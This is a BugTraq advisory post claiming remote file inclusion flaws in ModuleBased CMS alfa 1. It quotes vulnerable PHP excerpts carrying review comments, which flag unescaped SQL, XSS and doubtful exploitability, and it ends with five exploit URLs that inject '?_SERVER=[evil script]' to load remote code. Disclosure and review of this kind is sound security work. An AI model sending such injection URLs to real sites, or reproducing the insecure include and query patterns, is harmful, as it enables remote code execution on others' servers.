BugTraq
ModuleBased CMS alfa 1 Multiple Remote File Inclusion Aug 29 2006 04:41PM
amir scorpino yahoo com (1 replies)
+ModuleBased CMS(MBCMS) multiple remote file Inclusion

+description: MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and customizability. It is designed for PHP/MySQL and it is easy to write new modules or templates to suit a particular website.

+version:alfa 1

+vendor site:http://sourceforge.net/projects/mbcms/

+

+discovered by: ScorpinO

+location:IRAN/ANZALI

+sites: WwW.ScorpinO.NeT Www.deltahacking.iR

+email:amir.scorpino (at) yahoo (dot) com [email concealed]

+special tnx to:Dr.trojan,HIV++,D_7J,Vampire,......

+

+discovered in avatar.php archive.class.php login.php profile.class.php process.php

+

+

/admin/avatar.php

<?php

// Excerpt of /admin/avatar.php as quoted by the advisory: it loads the profile
// class and the site configuration, creates a Profile object and reads the
// avatar column for the user named in the session.
//
// Both include paths are built from $_SERVER[DOCUMENT_ROOT]. The key is written
// without quotes, so on the PHP 4/5 releases of the time it is read as an
// undefined constant and falls back to the string 'DOCUMENT_ROOT' with a notice.
//
// NOTE(review): the advisory's claim depends on a request being able to replace
// $_SERVER before these lines run. Nothing in this excerpt does that; it would
// hinge on the PHP version and on register_globals, neither of which the
// advisory states. Hardening that holds either way: register_globals off,
// allow_url_include / allow_url_fopen off, and include paths built from a
// fixed base such as dirname(__FILE__).
include_once($_SERVER[DOCUMENT_ROOT]."/libs/profile.class.php");

include($_SERVER[DOCUMENT_ROOT]."/libs/config.php");

$profile = new Profile();

// The session username is concatenated into the SQL text without escaping.
// NOTE(review): no session_start() or access check is visible in this excerpt
// of an /admin/ script; confirm config.php provides both. A parameterised
// query, or at minimum mysql_real_escape_string(), would remove the reliance
// on how the username was stored at login.
$q = mysql_query("SELECT avatar FROM users WHERE username='".$_SESSION['username']."'");

// $q is not checked for failure before it is fetched from.
$r = mysql_fetch_assoc($q);

?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/archive.class.php

<?php

// Excerpt of /libs/archive.class.php as quoted by the advisory.
//
// The include path is built from $_SERVER[DOCUMENT_ROOT] with an unquoted key.
// NOTE(review): a library file that is reachable by URL and runs an include at
// file scope is what the advisory is pointing at; whether the path can be
// influenced by a request depends on PHP version and register_globals, which
// the advisory does not state. Keeping /libs outside the web root (or denying
// direct requests to it) and using a fixed base path removes the question.
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");

/**
 * Prints posts grouped under a topic heading.
 */
class Archive{

/**
 * Echoes a topic label and then the 'post' column of every row that shares
 * that topic. Output is written directly with echo; nothing is returned.
 */
function AllArchives(){

$q = mysql_query("SELECT * FROM posts") or die (mysql_error());

while ($r = mysql_fetch_assoc($q)){

// Only topics 1 and 2 get a label; for any other value $topic keeps whatever
// it held before (unset on the first pass).
if($r['topic'] == 1)

$topic = "News";

if($r['topic'] == 2)

$topic = "Articles";

echo $topic;

// This reuses $q, the same variable the outer loop fetches from. Once the
// inner loop below has drained the new result, the outer fetch has nothing
// left to read, so the outer loop appears to stop after its first row.
// The topic value is concatenated into the SQL text; it comes from the
// database row rather than the request, but it is still unescaped.
// On failure, die(mysql_error()) prints the database error to the client.
$q = mysql_query("SELECT * FROM posts WHERE topic='".$r['topic']."'") or die (mysql_error());

// Post bodies are echoed as stored, with no HTML escaping.
// NOTE(review): if posts can contain user-supplied markup this is a stored
// XSS sink; confirm where posts are written.
while($r_posts = mysql_fetch_assoc($q))

echo $r_posts['post'];

}

}

}

?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/login.php

<?php

// Excerpt of /libs/login.php as quoted by the advisory: when the POST field
// 'login' is truthy it loads the User class and passes the submitted username
// and password to User::login().
//
// $_POST['login'] is read without isset(), so a request without that field
// raises a notice and skips the block.
if($_POST['login']){

// Include path built from $_SERVER[DOCUMENT_ROOT] with an unquoted key.
// NOTE(review): this include only runs inside the POST branch, so it is reached
// only by a request that carries a 'login' field. Whether the path can be
// influenced at all depends on PHP version and register_globals, which the
// advisory does not state; a fixed base path such as dirname(__FILE__) avoids
// the dependency.
include_once($_SERVER[DOCUMENT_ROOT]."/libs/user.class.php");

$user = new User();

// Raw request values are handed to login(); any validation or escaping would
// have to happen inside User, which is not shown here.
$user->login($_POST['username'], $_POST['pass']);

}

?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/profiles.class.php

<?php

// Excerpt as quoted by the advisory: the only statement shown is the include of
// the site configuration, with the path built from $_SERVER[DOCUMENT_ROOT]
// (unquoted key).
// NOTE(review): the heading above this excerpt spells the file
// profiles.class.php while the file list and the URL list say
// profile.class.php; confirm the name against the source tree.
// NOTE(review): whether a request can influence this path depends on PHP
// version and register_globals, which the advisory does not state. Denying
// direct requests to /libs and using a fixed base path removes the dependency.
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); ?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/profile/proccess.php

<?php

// Excerpt as quoted by the advisory: the only statement shown is the include of
// the site configuration, with the path built from $_SERVER[DOCUMENT_ROOT]
// (unquoted key).
// NOTE(review): the heading above this excerpt spells the file proccess.php
// while the file list and the URL list say process.php; confirm the name
// against the source tree.
// NOTE(review): whether a request can influence this path depends on PHP
// version and register_globals, which the advisory does not state. Denying
// direct requests to /libs and using a fixed base path removes the dependency.
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");

?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+exploit:

+

+http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script]

++

Re: ModuleBased CMS alfa 1 Multiple Remote File Inclusion Sep 02 2006 12:00AM
Carsten Eilers (ceilers-lists gmx de)


 
